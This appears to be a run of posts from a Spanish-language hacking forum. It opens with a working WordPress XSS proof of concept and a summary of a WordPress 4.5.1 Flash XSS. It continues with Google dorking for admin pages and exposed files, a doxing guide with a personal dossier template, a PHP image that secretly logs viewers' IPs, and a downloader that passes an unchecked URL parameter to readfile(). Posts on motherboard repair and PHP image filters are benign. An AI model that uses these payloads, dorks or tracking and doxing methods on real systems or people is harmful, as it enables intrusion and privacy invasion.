<button onclick="fire()">Click</button> <script> function fire() {  open('javascript:setTimeout("location=\'http://example.com/wp-includes/js/plupload/plupload.flash.swf?target%g=opener.document.body.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.click&uid%g=hello&\'", 2000)');   setTimeout('location="http://example.com/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-super-cache&TB_iframe=true&width=600&height=550"') } </script>


Para ver la explicacion a profundidad y el post original:
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
Resumen rapido

* XSS reflejado en Wordpress 4.5.1
* Reportado a finales de abril
* Arreglado en Wordpress 4.5.2


Introduccion

Wordpress 4.5.1 es vulnerable frente a un xss reflejado que se deriva de un proceso de inseguro de sanatizacion en la URL en el archivo flashmediaelement.swf. El codigo en el archivo intenta quitar No tienes permitido ver los links. Registrarse o Entrar a mi cuentaen caso de que se establezcan parametros en GET, pero no lo hace, lo que permite el XSS a traves de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

El ataque fue descubierto por primera vez por SNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta. La vulnerabilidad en flashmediaelement.swf fue descubierta en abril del 2016, identificado por primera vez como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Entonces despues de una revision en equipo, el potencial XSS fue descubierto y analizado por Heiderich, Kinugawa y Inführ. Por ultimo, se ha descubierto, que este archivo viene empaquetado con la ultima version de Wordpress y el problema se reporto a traves de No tienes permitido ver los links. Registrarse o Entrar a mi cuentapor Heiderich et al.

PoC: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Post Original y para ver como funciona el ataque por dentro:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
Introduccion

Antes que nada decirles que esto no es un curso completo, sin mas que nada un tipo de recoleccion de Tutoriales y Videotutoriales que les servira a mas de uno que apenas este iniciandose en esto. Antes que nada comentarles que intente buscar informacion de este tipo y no habia nada como esto en internet por lo cual me arme de valor para publicarlo :v, tambien quisiera comentarles que es recomendable que antes de iniciar este tutorial tengan un poco de conocimiento de electronica basica.


Inspeccion Visual

Lo primero y mas facil que podemos hacer para saber si una tarjeta madre esta dañada es inspeccionarla con una lupa. Para ver si un componente esta 'quemado' o 'hinchado'. Algunos ejemplos, podrian ser los siguientes:



Si por alguna razon no encontramos nada es hora de seguir el camino de la metodologia C:


Diagrama de la tarjeta madre

Este es un apartado interesante, ya que todos los componentes que se encuentran dentro de la placa del circuito impreso, podriamos dividirla en varios apartados, con los cuales podriamos encontrar el problema dependiendo de la falla en la tarjeta madre.
Algunos apartados pueden ser: el sistema de carga, Encendido, USB, etc. Un ejemplo del indice de un diagrama puede ser el siguiente:



Los diagramas los podemos encontrar usando nuestro queridisimo amigo Google! Usando algunos de estos tips para su busqueda:


   
CitarDatasheet XXX
    Block Diagram XXX
    Schematic XXX
    Diagram XXX

Donde XXX sera el modelo de la placa base o modelo de la laptop o PC. Quiero comentarles que existen infinidades de paginas que te dan los diagramas gratis pero tambien existen demasiadas que te los venden.

Ahora seria muy tedioso de alguna manera decirles cada componente de la tarjeta madre, por lo cual les dejare algunos videotutoriales y enlaces para leer y aprender.


En el siguiente enlace encontraras como leer un diagrama y lo que significa cada simbolo de los componentes electronicos:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De todas maneras si no te es suficiente te dejo un video de ejemplo:





Componentes SMD

Gracias a que ahora hay mas tecnologia han podido crear dispositivos mas pequeños para que los tengamos a nuestro alcance. SMD como sus siglas lo indican son dispositivos de montaje superficial. Los cuales son componentes un poco mas pequeños (que los de una placa base de CPU) montados en nuestra placa base superficialmente.

Condensadores

Los condensadores o capacitores nos sirven para almacenar energia.

 



Resistencias

Funciona ofreciendo una oposicion al paso de corriente. El problema que puede surgir es que se encuentre abierta (no deja pasar nada de corriente) o en cortocircuito (deja pasar toda la corriente).
Si con el óhmetro en todas las escalas la aguja no se mueve, estamos frente al primer caso. Si en la misma situación la aguja siempre marca el máximo, se trata del segundo. Si marca un nivel aproximado al del valor original de la resistencia, significa que está en perfectas condiciones. El valor original suele estar indicado con un código de colores, con el valor impreso sobre el componente o con un código numérico (que se puede averiguar en el manual de servicio del motherboard).

 


Diodos


Son pequeños componentes electrónicos que permiten el paso de la corriente en un solo sentido. Por lo tanto, el multímetro debería mover la aguja solo cuando el terminal positivo (rojo) se encuentre en la pata marcada con una línea. Si marca en ambas posiciones, significa que está en cortocircuito. Si, por el contrario, no se registran cambios estará abierto.

 


Transistores

Los transistores poseen tres patas (emisor, base y colector), que suelen estar identificadas con las letras E, B y C en la misma plaqueta donde se encuentran soldadas. Existen dos tipos de transistores: NPN y PNP. El primero se mide según el método que explicaremos a  continuación; para el segundo deberemos hacer lo mismo, pero con la polaridad invertida.
Posicionamos la escala del óhmetro en un valor comprendido entre x1 y x100, luego aplicamos el terminal negro (negativo) sobre la pata base y alternamos el rojo (positivo) entre las otras dos. De esta manera, tendría que haber conducción para ambos casos, y al invertir, obtendríamos un valor casi nulo. Por último, entre emisor y colector no debería de haber continuidad en ninguno de los sentidos.


 

 


Soldar correctamente con el cautin

 


Desoldar SMD

 

Conclusion

En pocas palabras reparar tarjetas madres conlleva un poco de dedicacion y esfuerzo, lo cual vale la pena ya que es el componente principal de una Laptop o Computadora de Casa, y ademas de ser el mas costoso, siguiendole la pantalla.

Esto es mas que nada una recopilacion, pero como no vi nada igual en la red, lo junte de una manera 'un poco ordenada' espero que a mas de uno le sea de ayuda, Saludos! 
#20


Hola el otra vez estaba chateando con un amigo Osanda Malith Jayathissa y le pregunte si podria traducir algunos de sus post y gracias a que me dejo hoy les traducire un post muy bueno que he visto en su blog.

Link para ver online: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link para descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#21
Seguridad web y en servidores / Google Hacking
Mayo 30, 2015, 12:20:37 PM
Introduccion
Buenas, en esta entrada trataré de explicar acerca de Google Hacking para usarlo en nuestras pruebas de penetracion o recoleccion de informacion en cualquier cosa que nos sirva, ya que con Google es solo saber utilizar de manera adecuada los operadores/directivas.

Tambien les puede interesar las siguientes entradas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Informacion que nos interesa

En el caso de estar recolectando informacion sobre una pagina puede haber demasiadas cosas que nos interesarian saber, entre las cuales se encuentran:

* El lenguaje que usa la pagina web
* El sitema operativo del servidor web
* El software del sistema operativo del servidor
* La version del software del servidor
* Si el sitio web tiene Plugins
* Si el sitio web tiene CMS popular
* Que tipos de archivos contiene mas que otros
* La base de datos que utiliza
* Los subdominios que tiene

La mayoria de la informacion que nos puede interesar puede venir de vulnerabilidades, tales como:

* Errores en la web o servidor
* Directorios que sabemos que pueden incluir informacion sensible
* Archivos que incluyen contraseñas
* Firewalls web

Una de las paginas que incluye mucha informacion sobre dorks de google para poder realizar nuestras busquedas es: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 




Busquedas especificas

Para realizar busquedas especificas de lo que queramos encontrar en google utilizaremos los famosos "operadores" que incluye para referirse a cierto tipo de cosas. Comentare de manera rapida los usos de cada uno:

- Con este signo menos excluimos algunos resultados.
+ Con este operador + podemos incluir varias busquedas en los resultados.
~ Con esta tilde se buscan sinonimos de la palabra que le asignes.
* Se utiliza el asterisco como comodin de palabras extra.
" Podemos usar las comillas dobles para buscar una palabra exacta que este entre ellas.

OR (|) Puedes buscar almenos una de varias palabras


site: Obtiene resultados de sitios o dominios que le asignes.
link: Busca paginas externas que contienen enlaces del sitio que le asignes.
related: Busca sitios web relacionados al que le asignes.
info: Obtiene informacion sobre el sitio o dominio que le asignes.
cache: Comprueba como era la pagina o direccion que le asignes la ultima vez que google lo visito.
intitle: Con este operador buscamos en el titulo de la pagina entre las etiquetas  <title>
inurl: Con este operador buscamos que la url incluya lo que le asigamos en la busqueda.
define: Este operador se utiliza para definir un termino de la palabra que le asignes.
filetype/ext: Con estos operadores buscamos un archivo por su extension o tipo de archivo.
intext: Incluye terminos que esten en el <body> de la pagina.
insubject: Incluye terminos que esten en el las etiquetas de titulo de la pagina.
inanchor: Incluye terminos que tengan la etiqueta <a> dentro del <body> de la pagina web.




Google ignora algunas palabras

Google ignora varias palabras como son "a", "el", "de" ... que muchas veces solo harian la busqueda mas pesada por lo que es recomendable no utilizarlas cuando intentemos encontrar informacion. Y podemos hacer busquedas inteligentes en lugar de escribir "me duele la cabeza" podriamos escribir "dolor de cabeza" con lo cual encontrariamos mejores resultados.




Buscar lo mas comun o mas afectado

Lo mejor para encontrar cosas es irnos a buscar lo mas comun o mas afectado en cualquier tipo de aplicacion web.

Mensajes de error: Failed to open stream, access denied, fatal error, division by zero, warning, error, include, ORA-xxxx, database error, error ocurred, error online, cannot modified header, a syntax error, the page cannot be found, internet information services, error diagnostic information, etc.
Mensajes HTTP: 200 OK, 300 Multiple choices, 301 Moved permanently, 302 Found, 304 Not Modified, 307 Temporary Redirect, 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found, 500 Internal server error, 501 Not implemented, 503 Service unavailable, 550 Permission denied, etc. Puedes ver una lista mas completa aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Servidores web: ISS, Apache, Apache Tomcat, Nginx, Lighttpd, Jigsaw, Klone, Abys web server, Oracle web tier, x5 web server, zeus web server, IBM HTTP server, LiteSpeed web server, etc. Puedes ver una lista mas completa aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: Wordpress,joomla, drupal, prestashop, tynicms, etc. 




Busquedas comunes para vulnerabilidades

Hay muchos dorks, los dorks son de manera sencilla una simple cadena de caracteres con los operadores anteriores la cual nos arroja un resultado deseado, tal como "tarjetas de creditos", "contraseñas de usuarios", "paginas phishing", etc.

Vamos a ver algunas de las tecnicas que yo utilizo muy comunmente para encontrar algunas cosas en algun sitio web:

Crawling:

Con esto puedes ver todo lo que ha indexado google del sitio web que buscas.

site:tudominio.com

Pagina de administracion:

Podemos encontrar paginas de administracion utilizando. Algunos de los operadores y palabras comunes.

site:dominio.com intext:admin OR intext:administrator
site:dominio.com inurl:admin OR inurl:administrator


Subdominios:

site:dominioprincipal.com -site:www.dominioprincipal.com
site:dominioprincipal.com -site:www.dominioprincipal.com -site:www.subdominio1.principal.com


Extensiones:

site:dominio.com ext:pdf | ext:log | ext:txt | ext:bak

Algunas extesiones:  pdf, xls, rar, zip , tar.gz, htm, php, bak, sql, csv, txt, log, conf

Archivos phpinfo, robots, o backups:

site:.net intitle:phpinfo() inurl:info.php
inurl:"robots.txt" intext:"disallow:"
intext:config ext:bak intitle:"index of"



Acceso a directorios:

intitle:"index of"
site:tusitio.com intitle:"index of"


Errores: Los errores son muy comunes en cualquier sitio web o servidor:




Crea tu propio DORK

Para crear un dork solo necesitamos utilizar los operadores ya conocidos anteriormente. Muchos usuarios intentan con cosas comunes que ven o simplemente encuentran una vulnerabilidad en un CMS no muy conocidos y le pasan operadores para encontrarla.

Anteriormente puse algunos dorks que no vi en ningun lugar solo se me ocurrio utilizar los operadores por que podrian ser utiles para encontrar informacion, por ejemplo... una manera de encontrar un poco mas rapido la informacion seria utilizar el tip recomendado en la entrada que les recomende al inicio:

^inurl:"e-vendo.php?shop="




Otras formas de Google Hacking:

Google Hacking Imagenes:

Bueno esto no es algo nuevo pero podriamos utilizar la busqueda avanzada que nos proporciona google: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

O tambien intentar buscar la imagen deseada utilizando el mismo buscador de imagenes, ya sea subiendo la imagen o pegando la URL, podriamos encontrar cosas interesantes de la empresa o persona relacionada a la pagina web.

Google Hacking Mapas:

Esto tampoco es nuevo pero con los mapas de google: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Nos es muy facil encontrar informacion sobre donde se encuentra la empresa o persona relacionada con la pagina web.

Bueno y hasta aqui este "tutorial" si se le puede llamar asi, no es nada de otro mundo, pueden ver muchos ejemplos en la pagina exploit-db la cual contiene muchos ejemplos para usar estos operadores, espero que a mas de uno le sea de utilidad y si encontrado lo que buscaban genial!
#22
El otra vez estaba en el IRC chateando, entro un usuario y pregunto sobre el tema de "investigar personas" muchos usuarios le dañaron la autoestima como es normal :D. Bueno pero ahora vengo hablarles sobre Doxing el cual se define como:




¿Que es Doxing?

Doxing (dox es una abreviacion de "documentos") es un proceso para obtener informacion personal de un objetivo siendo casi siempre una persona, en este tipo de documentos podemos obtener mucha documentacion sobre la persona tal como puede ser: nombre real, sexo, sitio web, alias, email, perfil de redes sociales, direccion, ip, etc. Este tipo de tecnicas entran dentro de la ingieneria social.

Hay muchas herramientas ya sea online o de escritorio las cuales te permiten automatizar este tipo de proceso, y la mejor forma de realizar esto es las conexiones que realices al buscar tu objetivo. Encontrar un nombre de usuario lleva a encontrar el nombre completo y esto puede conducir a la direccion fisica. El usuario puede llevar alguna fotografia lo cual puede resultar en dar su direccion o placas. Para nombres comunes como Cesar se le pueden agregar los intereses o localizacion para encontrar mas rapido lo buscado, es por esto tambien que muchas personas no confian en otras por internet debido a la informacion que se puede encontrar puede ser muchas veces un golpe bajo.



Otro tipo de ejemplo puede ser: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Obteniendo informacion de un objetivo

Aqui depende mas que nada del tipo de informacion que tengas con que empezar, ya sea el alias, el email, la direccion fisica, etc. Como comentabamos mas arriba un dox es una abreviacion de documento entonces por lo menos deberiamos tener el siguiente formato de documentacion el cual nos puede ser de utilidad:


   
CitarNombre de usuario/ Sobrenombre:
    Nombre real:
    Localizacion:
    Nacionalidad:
    Imagenes:
    Videos:
    Religion:
    Orientacion Sexual:
    Numero movil/telefono:
    Direccion IP:
    Sitios webs hackeados:
    Paginas de redes sociales:
    Foros en los que postea:
    Miembros de su familia:
    Ocupacion:
    Registro criminal:
    Informacion extra:



Por busqueda general usamos Google.

www.google.com

Podemos usar los famosos dorks para encontrar informacion, algunos ejemplos de utilidad pueden ser:

inurl: especificas el sitio donde deseas buscar a la persona.

alias inurl:www.elsitio.com
alias inurl:www.facebook.com

intitle: especifica que tenga en el titulo de cualquier pagina lo que le indiques.

alias intitle:bienvenido

intext: especficia que tenga en el cuerpo de la pagina lo que le indiques.

alias intext:juakear

Otro sitio de busqueda pueden ser:

www.bing.com
www.duckduckgo.com


Sitios webs recomendados para busqueda de informacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
http://checkusernames.com 

Ingieneria social

Como habiamos comentado arriba el proceso del doxing esta muy ligado a la ing. social por lo cual puedes agregar el email del usuario o en las redes sociales, para obtener los datos deseados, como dijo kevin mitnick:

    * Todos queremos ayudar.
    * El primer movimiento es siempre de confianza hacia el otro.
    * No nos gusta decir No.
    * A todos nos gusta que nos alaben.



Puedes comenzar desde ahi tus cimientos. Quizas te interese:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Formas de defenderse

Las recomendaciones para defenderse son:

* Intenta cambiar tu nickname cierto tiempo
* Intenta usar canales seguros (Proxys, VPNS, TOR)
* Para chatear por canales seguros (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
* Cifrar tus mensajes (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Como recomendacion haste un doxing a ti mismo, e intenta borrar todos los rastros que puedas encontrar.

* No dejar datos en redes sociales.
* Uso de correos temporales
* No usar datos reales
* No confiar (Esta no se aplica a todos, pero mucha gente que no sabes en cual confiar)

Espero que esta mini-introduccion sobre doxing les sea de utilidad a mas de alguno. Si tienen algunas tools o tecnicas que puedan compartir no olviden dejar sus comentarios.
#23
Back-end / [PHP]Filtros con la libreria GD
Mayo 07, 2015, 02:37:09 PM
Buenas en este caso utilizaremos la libreria PHP GD para aplicar algunos efectos comunes utilizando la funcion No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:

Citarbool imagefilter ( resource $image , int $filtertype [, int $arg1 [, int $arg2 [, int $arg3 [, int $arg4 ]]]] )

Como se describe la sintaxis arriba, necesitamos un recurso de imagen, una constante que aplicara el filtro (varios incluyen opciones y otros no).

Vamos a explicar algunas de las opciones que podremos usar.

IMG_FILTER_NEGATE - Esto lo que hace es negar los colores de la imagen (invertirlos).

IMG_FILTER_GRAYSCALE - Convierte la imagen a escala de grises.

IMG_FILTER_GAUSSIAN_BLUR - Pone la imagen borrosa utilizando el metodo Gaussiano.

IMG_FILTER_EMBOSS - Pone en relieve la imagen.

IMG_FILTER_EDGEDETECT - Detecta los bordes de la imagen para resaltarlos.

IMG_FILTER_BRIGHTNESS - Cambia el brillo de la imagen. Tiene un argumento el cual puede ir del valor -255 a 255.

IMG_FILTER_COLORIZE - Le da un color a toda la imagen, se usan tres parametros RGB (rojo, verde y azul), tambien puedes usar un cuarto parametro para valores alpha que va desde 0 a 127 lo cual le da transparencia a la imagen.

IMG_FILTER_CONTRAST - Cambia el contraste de la imagen.
Tiene un argumento el cual puede ir del valor -255 a 255.

IMG_FILTER_SMOOTH - Suaviza la imagen. Los valores recomendados son de -8 a 8 para que la diferencia se note pero no exageradamente.

Ahora veremos dos ejemplos en practica:

Codigo:

Código: php
$image = imagecreatefrompng("ay2bdLJ.png");
imagefilter($image, IMG_FILTER_NEGATE); // negar colores
header("content-type: image/png");
imagepng($image);
imagedestroy($image);


Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Filtro Aplicado: IMG_FILTER_NEGATE
Resultado:


Codigo:
Código: php
$image = imagecreatefrompng("space.png");
imagefilter($image, IMG_FILTER_COLORIZE,255,0,0); // le da color a la imagen, red green blue
header("content-type: image/png");
imagepng($image);
imagedestroy($image);

Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Filtro Aplicado: IMG_FILTER_COLORIZE
Resultado:



Y hasta aqui esta pequeña introduccion, es muy facil de usar, pero los efectos son bastante buenos, saludos!
#24
Back-end / [PHP] Creando una firma dinamica
Mayo 05, 2015, 04:05:41 PM
Introduccion

Buenas he estado sin tiempo para postear pero en esta ocasion les mostraré como crear una firma dinamica de manera que obtengan algunos datos, muchos ya saben como realizarlo por que no tiene tanta dificultad mas que nada se trata de utilizar la libreria de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Un buen tutorial que recomiendo mucho sobre PHP GD es el siguiente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el cual esta muy bien explicado.
Tratare de ser breve colocando solo los pasos.

Estructura a realizar

La estructura con la que trabajaremos sera la siguiente:



Explicando un poco que hace cada archivo.

.htaccess - Con este archivo interpretaremos imagenes png (con su extension .png) como archivos php y bloquearemos cualquier intento de acceso al archivo logs.txt

firma.php - Con este archivo generamos la imagen dinamica (pronto le cambiaremos la extension a .png)

KeepCalm-Medium.ttf - Es el tipo de letra que utilizaremos para la firma dinamica.

logs.txt - Aqui guardaremos los logs, en este caso IP, Sistema, Si usa proxy.

rVJgsdx.png - Es la imagen que utilizaremos para la firma dinamica.

view_logs.php - Este es un archivo para ver los logs online. Con un simple formulario que tiene que ingresar una clave.

Nota importante: Nada de aqui es guardado en una base de datos. Y esto es facilmente explotable haciendo peticiones desde la misma IP un sin fin de veces cargaria todo el archivo logs.txt haciendolo demasiado pesado (Esa idea la hizo un amigo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) entonces lo unico que podemos realizar en este caso es:

1.- Denegar las ips que realizen demasiadas peticiones
2.- No insertar IPS repetidas en el archivo logs.txt
3.- Cambiar el nombre de la carpeta para que no hagan mas peticiones.

Cualquiera de estos tres puntos no se ven en este tutorial.

Creando la firma

En este caso crearemos el archivo PHP para realizar la firma dinamica, no entrare en detalles de explicaciones ya que comente el codigo lo mas posible para que se entendiera, de todas maneras si no entienden algo, arriba deje una buena documentacion con la que pueden guiarse.

Código: php
 <?php
// no reportamos errores
error_reporting(0);
// el nombre de la imagen a poner como firma
$im_name = "rVJgsdx.png";
// los datos de la imagen
$data_im = getimagesize($im_name);
// el tipo de imagen
header("Content-type: {$data_im['mime']}");
// creamos la imagen en este caso png
$im = imagecreatefrompng($im_name);
// creamos un color para usarlo en el texto
$color = imagecolorallocate($im, 45, 196, 236);
// obtenemos la IP
$ip = $_SERVER['REMOTE_ADDR'];
// obtenemos los datos del navegador
$user_agent = $_SERVER['HTTP_USER_AGENT'];
// vemos si existe algun proxy (no es 100% fiable), y lo agregamos a la variable ip
$proxy_headers = array(
        'HTTP_VIA',
        'HTTP_X_FORWARDED_FOR',
        'HTTP_FORWARDED_FOR',
        'HTTP_X_FORWARDED',
        'HTTP_FORWARDED',
        'HTTP_CLIENT_IP',
        'HTTP_FORWARDED_FOR_IP',
        'VIA',
        'X_FORWARDED_FOR',
        'FORWARDED_FOR',
        'X_FORWARDED',
        'FORWARDED',
        'CLIENT_IP',
        'FORWARDED_FOR_IP',
        'HTTP_PROXY_CONNECTION'
    );
    foreach($proxy_headers as $x){
        if (isset($_SERVER[$x])) {
         $ip .= "/Estas usando proxy!";
         break;
        }
    }

    // reemplazamos los datos del navegador en caso de que sea firefox por firefox o chrome por chrome, la lista es corta se pueden agregar mas
$navegador = preg_replace('/.*(firefox|chrome).*/i', '$1', $user_agent);
// lo mismo que arriba en este caso con el sistema, igual podemos hacer la lista personalizable
$sistema = preg_replace('/.*(windows|mac|linux).*/i', '$1', $user_agent);
// guardamos los datos en una variable para usarla en el texto
$string = " Tu IP: $ip \n Tu navegador: $navegador \n Tu sistema: $sistema \n Te estoy vigilando!\n";
// asignamos una variable con la fuente para usarla en el texto
$fuente = "KeepCalm-Medium.ttf";
// en caso de que no se haya detectado nada mostramos el navegador, aunque nos trolleen xD :P
if($navegador == ''){
  $navegador = $_SERVER['HTTP_USER_AGENT'];
}
// what? :3, Guardamos logs
$manejador = fopen("logs.txt", 'a+');
fwrite($manejador, "$string\n\n\n");
fclose($manejador);
// magia is here! Mostramos el texto en las coordenadas dadas
imagettftext($im, 10, 0, 300, 10, $color, $fuente, $string);
// png transparency, para la transparencia en la imagen sino se veria desfigurada
imagealphablending($im, true);
imagesavealpha($im, true);
imagepng($im);
// destroy image, liberamos la memoria
imagedestroy($im);
?>



Asignar formato a la imagen y denegar acceso a los logs

En este apartado crearemos el archivo .htaccess el cual denegara acceso a los logs y interpretara nuestro archivo png como php.

CitarAddType application/x-httpd-php .png
<FilesMatch "\.(txt)$">
  Order Deny,Allow
  Deny from all
</FilesMatch>

Creando archivo para ver los logs

Por ultimo creamos nuestro archivo view_logs.php con el cual veremos los logs.

Código: php
 <?php
if (isset($_POST['pass']) && !empty($_POST['pass']) && $_POST['pass'] == 'tucontraseñae.e') {
  $gestor = fopen('logs.txt', 'r');
  $contenido = fread($gestor, filesize('logs.txt'));
  fclose($gestor);
  echo "<pre>" . $contenido . "</pre>";
}
?>
<form method="post" action="">
<p><input type="text" name="pass" /></p>
<p><input type="submit" name="enviar" /></p>
</form>


En este caso solo hay que cambiar tucontraseñae.e por la contraseña que le quieras asignar a la entrada.

Finalizando

Le cambiamos la extension al archivo firma.php y le ponemos el nombre que queramos en mi caso firma.png
Lo abrimos en el navegador para ver los resultados.



En este caso mi ip es ::1 ya que es una ip local.

Les dejo por ultimo los archivos por si quieren probarlo, igual pueden realizar el suyo propio cambiando algunas funciones como dependiendo del tipo de imagen que sea JPEG, PNG, etc. el tipo de letra, sus datos, etc. De igual manera con esto podrian crearse hasta generadores de firmas, saludos!

Archivos: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#25
Back-end / [PHP] SoundCloud Downloader
Abril 21, 2015, 01:36:40 PM
Buenas, he estado algo ocupado esta semana por lo cual no he creado ninguna nueva entrada, pero en esta entrada les pondre el codigo de una clase que creé hace poco, lo unico que tienen que modificar sería la API de su soundcloud, aunque es algo 'tonta' mi clase, espero que a mas de a uno le sea de utilidad.

class.soundcloud.php

Código: php
 <?php
  /**
  * Con esta clase puedes obtener enlaces directos desde souncloud usando su API.
  * Con solo asignar la URL ya sea una playlist o un song devolvera los links o solamente el link.
  * Tambien podemos descargar los archivos.
  *
  * @author arthusu <[email protected]>
  *
  * @package SoundCloud Downloader
  *
  * @copyright 2015 arthusu
  */
class Soundcloud
{
  const STREAM = 'http://media.soundcloud.com/stream/';

  const CLIENT_API = 'AquiPonesTuApi';

  /** @var string URL para sacar JSON */
  private $api = 'http://api.soundcloud.com/resolve.json?url=URL&client_id=';

  /** @var string El identificador del SONG */
  private $id;
  /** @var string La URL del SONG o PLAYLIST */
  private $url;
  /** @var array Nombres de los SONGS */
  private $names = array();
  /**  @var string Almacena el JSON retornado */
  private $json;
  /** @var array LINKS */
  private $playlist = array();

  /**
  * Obtiene el/los titulos del Song.
  *
  * @return array Devuelve los titulos
  */
  public function getTitle(){
   return $this->names;
  }

  /**
  * Obtiene el JSON de la URL que le asignes, Usamos la API para obtener la informacion.
  *
  * @param string $url La URL a retornar.
  *
  * @return void
  */
  public function getURL($url){
   $this->url = $url;
   $this->api = $this->api . self::CLIENT_API;
   $this->json = json_decode(file_get_contents(str_replace("URL", $this->url, $this->api)));

  }

  /**
  * Obtiene el ID del JSON arrojado por la URL, el ID del SONG
  *
  * @return void
  */
  public function getID(){
   if(!empty($this->json)){
    $this->id = $this->json->{'waveform_url'};
    array_push($this->names,$this->json->{'title'});
    $this->id = substr(parse_url($this->id, PHP_URL_PATH),1,12);
   }
  }

  /**
  * Obtiene el LINK DIRECTO de la SONG
  *
  * @see Soundcloud::getID()
  *
  * @return string Devuelve la URL directa del archivo.
  */
  public function getSong(){
   self::getID();
   return self::STREAM . $this->id;
  }

  /**
  * Obtiene los LINKS DIRECTOS de la PLAYLIST
  *
  * @see Soundcloud::getID()
  *
  * @return array devuelve un array de links.
  */
  public function getPlaylist(){
   foreach($this->json as $obj){
    if(is_array($obj)){
     foreach($obj as $arr){
      $this->json = $arr;
      self::getID();
      array_push($this->playlist,self::STREAM . $this->id);
     }
    }
   }
   return $this->playlist;
  }

  /**
  * Descarga el archivo de La URL dada
  *
  * @param string $url La URL para descargar el archivo.
  *
  * @return void
  */
  public function downloadArchive($url){
    header("Content-type: audio/mpeg");
    header("Content-Disposition: attachment; filename=\"".uniqid(md5(rand())) .".mp3\"");
    header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
    header("Expires: 0"); // Fecha en el pasado
    header('Content-Description: File Transfer');
          header('Content-Transfer-Encoding: binary');
          header('Pragma: public');
    readfile($url);
  }

}
?>


El siguiente es un ejemplo de uso rapido:

soundcloud_downloader.php

Código: php
 <?php
set_time_limit(0);
require_once('class.soundcloud.php');
$soundcloud = new SoundCloud();
?>
<title>SoundCloud Downloader</title>
<style type="text/css">
body{
  width:800px;
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
.right{
  width: 300px;
  padding-left: 10px;
  float:right;
  margin:10px;
  height: 30px;
}
.left{
  width: 300px;
  padding-right: 10px;
  float:left;
  margin:10px;
  height: 30px;
}
.clear{
  clear: both;
}
</style>
<div class="clear">
<h1>SoundCloud Downloader</h1>
<form action="" method="post">
<p>URL: <input type="text" name="url" size="100" /></p>
<p><input type="submit" name="enviar" /></p>
</form>
</div>
<?php

$playlist = "";

if(isset($_GET["url"])){
  if(file_exists($_GET['url'])){
   echo "Tramposin";
  }else{
   $soundcloud->downloadArchive($_GET["url"]);
   exit();
  }
}

if(isset($_POST['enviar']) && filter_var($_POST['url'], FILTER_VALIDATE_URL)){
 
  $soundcloud->getURL($_POST['url']);

  if(stristr($_POST['url'],"sets")){
   $playlist = "on";
  }else{
   $playlist = "off";
  }
  echo '<table border="1">';
  echo '<tr>';
  switch ($playlist) {
   case 'on':
    echo '<div class="right">';
    foreach($soundcloud->getPlaylist() as $url){
      echo '<a href="?url='.$url.'">Download</a>';
      echo '<audio controls preload>
      <source src="'.$url.'" type="audio/ogg">
      Tu navegador no soporta la etiqueta audio.
      </audio>
<hr />
      ';
    }
    echo '</div>';
    echo '<div class="left">';
    foreach ($soundcloud->getTitle() as $title) {
     echo $title .'
<hr />';
    }
    echo '</div>';
    break;
   case 'off':
    $url = $soundcloud->getSong();
    echo '<div class="right">';
    echo '<a href="?url='.$url.'">Download</a>';
    echo '
     <audio controls>
     <source src="'.$url.'" type="audio/ogg">
     Tu navegador no soporta la etiqueta audio.
     </audio><hr />
    ';
    echo '</div>';
    echo '<div class="left">';
